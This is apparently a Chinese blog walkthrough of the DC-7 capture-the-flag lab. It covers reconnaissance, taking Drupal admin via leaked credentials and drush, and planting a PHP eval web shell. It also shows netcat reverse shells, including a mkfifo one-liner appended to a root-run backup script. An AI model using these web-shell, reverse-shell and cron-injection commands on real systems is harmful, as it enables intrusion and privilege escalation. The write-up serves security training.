Vulhub 靶场 DC-7解析

2024-03-15 1,043 0

一、环境搭建

kali的靶攻击机IP地址:192.168.200.14

DC-7靶机的IP地址:暂时未知

注意:靶机和攻击机应处于一个网卡下

通过MAC地址判断靶机DC-7的IP 地址

二、信息收集

1、探索网段内存活的主机

第一种方式:

arp-scan -l 

Vulhub 靶场 DC-7解析插图

第二种方式:

nmap -T4 -sP 192.168.200.0/24 -oN nmap200.sP

Vulhub 靶场 DC-7解析插图1

第三种方式:

netdiscover -i eth0 -r 192.168.200.0/24 #eth0代表网卡  -r代表网段

Vulhub 靶场 DC-7解析插图2

2、扫描站点开放的端口信息

nmap -p 1-65535 192.168.200.10 

Vulhub 靶场 DC-7解析插图3

开放的端口有80端口和22端口

3、扫描目录

Vulhub 靶场 DC-7解析插图4

Vulhub 靶场 DC-7解析插图5

Vulhub 靶场 DC-7解析插图6

Vulhub 靶场 DC-7解析插图7

4、网站指纹

第一种方式,可以安装火狐插件

第二种方式,在kali当中执行命令

whatweb -v 192.168.200.10

登陆网站,通过火狐插件可以知道网站使用的CMS是Drupal

Vulhub 靶场 DC-7解析插图8

当然,可以看到网站欢迎界面的英文信息

DC-7引入了一些“新”概念,但我让你来弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的就是跳出框框思考。
盒子外面的路。:-)  #可知口令爆破是行不通的

三、漏洞测试

社工手段

百度搜索账户名

Vulhub 靶场 DC-7解析插图9

是github账户,点击进入

Vulhub 靶场 DC-7解析插图10

可以看到全是配置文件,然后从底部的英文翻译可以知道,找对地方了

Vulhub 靶场 DC-7解析插图11

Vulhub 靶场 DC-7解析插图12

得到数据库账户密码

账户名:dc7user
密码:MdR3xOgB7#dW
数据库名:Staff

Vulhub 靶场 DC-7解析插图13

几个可能的突破点:

1 网站首页的搜索框,尝试直接查询passwd等文件或直接输入linux命令查看,都以失败收尾;

2 尝试扫描网站目录,没发现什么有价值的目录,倒是发现了robotx.txt文件,这个文件作为常见的可以让爬虫程序扫描的文件之一,控制是否想让爬虫去爬取本站信息;

3 对于robots.txt文件,对里面的目录或者文件都进行了访问查看,未发现有用的信息

Vulhub 靶场 DC-7解析插图14

没啥有用的,从刚才的账号密码入手进行ssh连接,登陆成功之后,看看home目录下有什么其他账户的文件夹

ssh [email protected]

Vulhub 靶场 DC-7解析插图15

发现一个backups文件夹和一个mbox文件

进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码

Vulhub 靶场 DC-7解析插图16

Vulhub 靶场 DC-7解析插图17

进入mbox中发现脚本文件的路径

Vulhub 靶场 DC-7解析插图18

dc7user@dc-7:~$ cd /opt/scripts

dc7user@dc-7:/opt/scripts$ cat backups.sh 

主要信息:

Shell脚本文件 /opt/scripts/backups.sh

数据库文件:/home/dc7user/backups/website.sql

网站数据: /home/dc7user/backups/website.tar.gz

Vulhub 靶场 DC-7解析插图19

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456" 

网页都会存在一个admin账户,也可以在网页的登录界面进行尝试,提示修改成功

Vulhub 靶场 DC-7解析插图20

来到网站后台,使用admin/123456登录网站,成功登录

http://192.168.200.10/user/login

Vulhub 靶场 DC-7解析插图21

在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

php介绍页面如下,模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

依次点击

Vulhub 靶场 DC-7解析插图22

安装完之后,跳转,然后点击激活

Vulhub 靶场 DC-7解析插图23

Vulhub 靶场 DC-7解析插图24

Vulhub 靶场 DC-7解析插图25

对该页面进行编辑,添加一句话PHP代码,并保存为PHP代码

<?php
@eval($POST[123]);
?>

Vulhub 靶场 DC-7解析插图26

欢迎页面是网站的首页,所以直接使用中国蚁剑连接网站,成功连接getshell

Vulhub 靶场 DC-7解析插图27

反弹SHELL

习惯性的反弹了一次shell到kali,在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听6666端口,并反弹shell到kali,切换shell外壳

nc -e /bin/bash 192.168.200.14 6666
nc -lvvp 6666
python -c 'import pty;pty.spawn("/bin/bash")'

Vulhub 靶场 DC-7解析插图28

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

Vulhub 靶场 DC-7解析插图29

提权

写入反弹shell代码到backups.sh脚本文件中,并在kali监听8899端口,等待计划任务执行,稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.200.14 8899 >/tmp/f" >> backups.sh

nc -lvvp 8899

Vulhub 靶场 DC-7解析插图30

# 记得kali也要开启侦听

nc -lvvp 8899

等待之后....

Vulhub 靶场 DC-7解析插图31

获得flag


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论